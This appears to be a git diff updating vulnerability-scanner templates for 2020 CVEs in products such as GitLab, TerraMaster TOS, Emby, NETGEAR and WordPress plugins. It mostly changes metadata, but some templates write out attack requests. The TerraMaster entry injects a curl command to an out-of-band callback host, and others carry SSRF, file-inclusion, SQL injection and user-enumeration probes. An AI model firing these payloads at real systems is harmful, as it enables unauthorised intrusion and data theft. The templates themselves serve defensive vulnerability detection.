tags: cve,cve2020,xstream,ssrf,oast http: - raw: @@ -59,4 +64,4 @@ http: words: - "User-Agent: Java" -# Enhanced by md on 2023/04/12 +# digest: 4b0a00483046022100e33718b3e34b1e72741a3511e9ed41a59e41b672e989e3ebccfac9e4473a58220221008c40f96abf98d1a7fd37daf80404d784d20120d20b0388a11b6258b7641649dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index c7b27a83a0..2fc540cb32 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -5,21 +5,27 @@ info: author: _0xf4n9x_,pikpikcu severity: medium description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Gitlab CE/EE to version 13.6.3 or later. reference: - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 + - https://hackerone.com/reports/972355 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* - epss-score: 0.70208 + epss-score: 0.65771 + epss-percentile: 0.97544 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 + vendor: gitlab + product: gitlab shodan-query: http.title:"GitLab" - tags: cve,cve2020,gitlab,exposure,enum,graphql + tags: hackerone,cve,cve2020,gitlab,exposure,enum,graphql http: - raw: @@ -50,8 +56,8 @@ http: extractors: - type: json - part: body json: - '.data.users.edges[].node.email' + part: body -# Enhanced by md on 2023/02/01 +# digest: 490a0046304402203ed91739676fbd8abf05c1202efc8afdfb3706aec0558ad2931e7cbaacf9d46102201ae3ce6766a9ea30d7565f50ecc7717406b1cd0a37dc3d3c9413366763d93d78:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index e6df150a54..4362b36aa9 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -5,21 +5,28 @@ info: author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. + remediation: | + Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - https://plugins.trac.wordpress.org/changeset/2388997 + - https://plugins.trac.wordpress.org/changeset/2389243 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-26876 cwe-id: CWE-306 - cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:*:*:* - epss-score: 0.01185 - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb + epss-score: 0.01156 + epss-percentile: 0.83297 + cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wpcoursesplugin + product: wp-courses + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb http: - method: GET @@ -28,6 +35,11 @@ http: matchers-condition: and matchers: + - type: word + part: header + words: + - "application/json" + - type: regex part: body regex: @@ -35,15 +47,10 @@ http: - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - - type: word - part: header - words: - - "application/json" - - type: status status: - 200 - 404 condition: or -# Enhanced by mp on 2022/03/21 +# digest: 4a0a00473045022020c0358a350255a66548651f9a0e5b10bd1cd03ff2226f63bc78ad8337db6f38022100c2e85f00bcfe291596dd14c34fd611845a10a4cd89642b9183d15dd9cb5404ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index f508f3f8b9..313fefa025 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ @@ -14,10 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26919 - epss-score: 0.974 - tags: cve,cve2020,netgear,rce,oast,router,unauth,kev + epss-score: 0.97336 + epss-percentile: 0.9985 + cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: jgs516pe_firmware + tags: cve,cve2020,netgear,rce,oast,router,unauth,kev http: - raw: @@ -30,8 +36,8 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# Enhanced by mp on 2022/03/27 +# digest: 4a0a0047304502206eb53c1dae67f3517d1704107b86af82f5c1b580e122b7c01aad042037dae34f022100cb81795612419af687c76170e808221f28751bbf683f45b804c3919d3937e31d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 92f064b05e..5ad8dfce07 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter. + remediation: | + Apply the latest security patches or upgrade to a patched version of Emby Server. reference: - https://github.com/btnz-k/emby_ssrf - https://nvd.nist.gov/vuln/detail/CVE-2020-26948 @@ -14,28 +16,34 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26948 cwe-id: CWE-918 + epss-score: 0.13986 + epss-percentile: 0.95051 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* - epss-score: 0.0284 - tags: cve,cve2020,emby,jellyfin,ssrf metadata: max-request: 1 + vendor: emby + product: emby + tags: cve,cve2020,emby,jellyfin,ssrf http: - method: GET path: - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" + matchers-condition: and matchers: + - type: word + part: body + words: + - "Name or service not known" + + - type: word + part: header + words: + - "text/plain" + - type: status status: - 500 - - type: word - words: - - "Name or service not known" - part: body - - type: word - words: - - "text/plain" - part: header -# Enhanced by mp on 2022/03/27 +# digest: 4a0a00473045022100cf6e85f49697ded0c17e0abd5857d2cf1940fac03bf5b29aab6a698f08fa4ada02200b0fb78d3455d96909c14298ae9f133e099558531d22b59d19540e26f9bcd319:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index 1ba1d9c46d..507d8373c0 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + remediation: | + Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi - http://lionwiki.0o.cz/index.php?page=Main+page @@ -14,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 + epss-score: 0.00787 + epss-percentile: 0.79506 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* - epss-score: 0.00723 - tags: cve,cve2020,lionwiki,lfi,oss metadata: max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve,cve2020,lionwiki,lfi,oss http: - method: GET @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/15 +# digest: 4b0a00483046022100b6e489b25341b56fc719011c4402fffaa25fe096d11f77595d3c1525f855293902210089267ba6321bd1c5a82b7f6ec86b369577a7bc00f81d0e1adb493146c9551e08:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 41390f3afa..2541b0a2b4 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://redrays.io/cve-2020-2733-jd-edwards/ - https://www.oracle.com/security-alerts/cpuapr2020.html @@ -14,12 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* - epss-score: 0.10266 + epss-score: 0.29785 + epss-percentile: 0.96392 + cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: port:8999 product:"Oracle WebLogic Server" verified: true + max-request: 1 + vendor: oracle + product: jd_edwards_enterpriseone_tools + shodan-query: port:8999 product:"Oracle WebLogic Server" tags: cve,cve2020,oracle,weblogic,disclosure,exposure http: @@ -43,4 +48,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/01 +# digest: 4b0a00483046022100bc72f14571d46d1df28e43feff82be2cf5b6d22cd2df8f5c9c01d2afc3c29aed022100eef670107ebf416a5307b8864ba264c53c9ba974902a389a584d302cf3edd26c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 0a752d72c4..6dcd8e281d 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -5,19 +5,23 @@ info: author: gy741 severity: high description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories. + remediation: | + Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability. reference: - - https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27361 cwe-id: CWE-668 - cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:*:*:*:*:*:*:*:* - epss-score: 0.03049 - tags: cve,cve2020,akkadian,listing,exposure + epss-score: 0.0314 + epss-percentile: 0.90004 + cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: akkadianlabs + product: akkadian_provisioning_manager + tags: cve,cve2020,akkadian,listing,exposure http: - method: GET @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/15 +# digest: 4a0a00473045022100ec75ffffedbe612649a380b4aebea7b88708fddc45d9a14ec26543fcb7eed76e0220680c254273b64d05616f4bbd867c8c614bd5a967228cfe538562cc387efdd5c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 8f7ae00019..07893c9570 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. + remediation: | + Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - https://processwire.com/ @@ -15,11 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 + epss-score: 0.00845 + epss-percentile: 0.80261 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* - epss-score: 0.00324 - tags: cve,cve2020,processwire,lfi,cms,oss metadata: max-request: 1 + vendor: processwire + product: processwire + tags: cve,cve2020,processwire,lfi,cms,oss http: - method: GET @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/15 +# digest: 490a00463044022034e15ade0007acc668c3fa602c79bc24115a5bf5c68ada0fe29433551c0efa40022057af503fd4643d284a84845982a4d018e5062f627fb87fa1655371ac0a907d25:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 1a70b65867..1b5f9bae1f 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -6,15 +6,26 @@ info: severity: critical description: | An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + remediation: | + Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397 - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070 - https://nvd.nist.gov/vuln/detail/CVE-2020-27481 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-27481 - tags: goodlayerslms,sqli,wpscan,cve,cve2020 + cwe-id: CWE-89 + epss-score: 0.09369 + epss-percentile: 0.94048 + cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: goodlayers + product: good_learning_management_system + framework: wordpress + tags: goodlayerslms,sqli,wpscan,cve,cve2020 http: - raw: @@ -33,3 +44,5 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and + +# digest: 4b0a00483046022100fa2743aea930b50eb2eadf61ac1b150a14203a534fc2bb6c1bad6a9dee5ecb38022100cf02c6e16906bca2b066ad2b9ca5b66733ac3241c0efc58715c280bc25cc2e7b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 52216d23cf..ee96a16403 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + remediation: | + Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.wftpserver.com/serverhistory.htm - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html @@ -15,11 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* - epss-score: 0.00179 - tags: cve,cve2020,xss,wing-ftp + epss-score: 0.00216 + epss-percentile: 0.59414 + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wftpserver + product: wing_ftp_server + tags: cve,cve2020,xss,wing-ftp http: - method: GET @@ -29,17 +34,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/14 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ef209c5e7feee18019f8c145f4b8b4980a22b99868bc0608020f7c4bd12775b4022100f3bac396e76165b0139f1b2310743f8ef5315e0a1c0b9f6357846a5f4eaab905:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 264468488a..e726f5599d 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations. + remediation: | + Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability. reference: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ @@ -15,11 +17,15 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-27866 - cwe-id: CWE-288 - epss-score: 0.00365 - tags: cve,cve2020,netgear,auth-bypass + cwe-id: CWE-288,CWE-287 + epss-score: 0.00433 + epss-percentile: 0.7174 + cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: ac2100_firmware + tags: cve,cve2020,netgear,auth-bypass http: - raw: @@ -33,13 +39,13 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - 'Debug Enable!' + - type: status status: - 200 - - type: word - words: - - 'Debug Enable!' - part: body - -# Enhanced by mp on 2022/07/15 +# digest: 4b0a0048304602210096bc81160be197a6f13e2b8435fad76f4e92ba8270f2f5d4b2f726d1e70739c7022100888d23536bdba0bc8f82c3babb053f1ceb601767070d57ae613bc9fa56c1c188:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 40d4e7a858..3b93270c8a 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail. reference: - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html - https://cxsecurity.com/issue/WLB-2020100161 @@ -15,10 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27982 cwe-id: CWE-79 - cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* - epss-score: 0.0017 + epss-score: 0.00178 + epss-percentile: 0.54795 + cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: icewarp + product: mail_server shodan-query: title:"icewarp" tags: xss,icewarp,packetstorm,cve,cve2020 @@ -29,18 +34,18 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/14 +# digest: 4a0a0047304502205e0fa689042ddb78a6a4a62455e443b0bfcfc8807dacf87f1f71a0260d009c12022100e23542181246939e7d1e3a0a276aea3f337c0b570e0b02c6102b882eb92568e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index a1298076ab..016e996388 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -7,20 +7,23 @@ info: description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. + remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ - https://nvd.nist.gov/vuln/detail/CVE-2020-27866 - remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27986 - cwe-id: CWE-306,CWE-312 - cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* - epss-score: 0.23185 - tags: cve,cve2020,sonarqube + cwe-id: CWE-306 + epss-score: 0.1352 + epss-percentile: 0.94976 + cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sonarsource + product: sonarqube + tags: cve,cve2020,sonarqube http: - method: GET @@ -30,15 +33,16 @@ http: matchers-condition: and matchers: - type: word + part: body words: - email.smtp_host.secured - email.smtp_password.secured - email.smtp_port.secured - email.smtp_username.secured - part: body condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/07/15 +# digest: 490a00463044022062b7ba38dd19c9c49c11283c9d0e986811a74d6d8d5f4061733fec6ed1900d1502202fca7e55bc74b60c29e8656305e978f3327d38499cc215b8060339f3060d1dbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml new file mode 100644 index 0000000000..eac39824f3 --- /dev/null +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -0,0 +1,69 @@ +id: CVE-2020-28185 + +info: + name: TerraMaster TOS < 4.2.06 - User Enumeration + author: pussycat0x + severity: medium + description: | + User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. + remediation: | + Upgrade TerraMaster TOS to version 4.2.06 or later. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md + - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.terra-master.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-28185 + epss-score: 0.00454 + epss-percentile: 0.72412 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: terra-master + product: tos + fofa-query: '"TerraMaster" && header="TOS"' + tags: cve,cve2020,terramaster,enum,tos + +http: + - raw: + - | + GET /tos/index.php?user/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /wizard/initialise.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/tos/index.php?user/login + + tab=checkuser&username=admin + + cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"email":' + - '"status":' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_2 + regex: + - '"username":"(.*?)"' + - '"email":"(.*?)"' + +# digest: 4a0a00473045022100e62d631614f4df7f5e2dc4205ba28dd969fe39885a2f47ddb0b6e0b4c3afb99d022030e18b24c5deefe92a695cac23cd6a2f3beeb40f24d9fc4adce385a8d8105e59:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 630b3cc555..0377a14fad 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -5,22 +5,27 @@ info: author: gy741 severity: critical description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter. + remediation: | + Apply the latest security patch or update provided by TerraMaster to fix the vulnerability. reference: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 + - http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 + epss-score: 0.9724 + epss-percentile: 0.99779 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* - epss-score: 0.97266 - tags: cve,cve2020,terramaster,rce,oast,mirai,unauth metadata: max-request: 2 - + vendor: terra-master + product: tos + tags: packetstorm,cve,cve2020,terramaster,rce,oast,mirai,unauth variables: useragent: '{{rand_base(6)}}' @@ -29,16 +34,16 @@ http: - | GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} - - | GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" @@ -47,4 +52,4 @@ http: words: - "User-Agent: {{useragent}}" -# Enhanced by mp on 2022/03/27 +# digest: 4a0a0047304502204bb02ef830a1872b0a6f24394d7d0de717296a048ad5ecc1b1cf594ea27dead1022100df64c79c90a8f621ea7d8fbc8a744bcabf1d28e4239f90983a2f9bfc720b62b8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index bd6aa896ab..ef86a6ba84 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208). reference: - https://trovent.io/security-advisory-2010-01 - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt @@ -16,10 +18,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28208 cwe-id: CWE-203 + epss-score: 0.00847 + epss-percentile: 0.80275 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - epss-score: 0.00732 metadata: max-request: 1 + vendor: rocket.chat + product: rocket.chat tags: packetstorm,cve,cve2020,rocketchat http: @@ -34,14 +39,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '"result\":false' - '"success":true' - part: body condition: and -# Enhanced by md on 2023/04/04 + - type: status + status: + - 200 + +# digest: 490a004630440220615f569a7460267aea4ceeafa6f06e1338aec082eb6fbc954af70e32e77ea827022066a9c122d7b2df26738a66a6811a77349026a27fed616d656d8622857cfb225e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 4333e57b7e..2de3a2a8f5 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -5,42 +5,50 @@ info: author: pikpikcu severity: medium description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page. + remediation: | + Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability. reference: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://www.mitel.com/articles/what-happened-shoretel-products - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://github.com/dievus/cve-2020-28351 classification: cvss-metrics: 